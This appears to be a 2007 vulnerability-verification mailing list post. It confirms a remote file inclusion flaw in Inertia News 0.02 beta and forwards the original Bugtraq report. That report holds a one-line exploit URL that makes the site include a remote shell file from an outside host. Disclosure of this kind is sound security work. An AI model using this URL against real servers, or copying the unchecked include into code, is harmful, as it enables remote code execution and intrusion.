[VIM] true: Inertia News Remote File İnclude

Noam Rathaus noamr at beyondsecurity.com
Tue Feb 13 05:08:48 EST 2007


Hi,

It looks legit:

<snip>
require ("$inews_path/inertia_sql_class.php");
</snip>

No tests done to the value.

Product looks like abandon ware (http://www.brentc.com/inertianews/).

----------  Forwarded Message  ----------

Subject: Inertia News Remote File &#304;nclude
Date: Monday 12 February 2007 22:55
From: crazy_king at eno7.org
To: bugtraq at securityfocus.com

Version :
0.02 beta

Error :
require ("$inews_path/inertia_sql_class.php");

Exploit :
 http://www.victim.com/inertianews_main.php?inews_path=http://www.site.com/sh
ell.txt

Eno7.Org - Crazy-King.ORg

Thanks : Apaci & Erne & Eno7 & Tamturk & UyussMan & Ayy&#305;ld&#305;z Tim

-------------------------------------------------------

-- 
  Noam Rathaus
  CTO
  1616 Anderson Rd.
  McLean, VA 22102
  Tel: 703.286.7725 extension 105
  Fax: 888.667.7740
  noamr at beyondsecurity.com
  http://www.beyondsecurity.com


More information about the VIM mailing list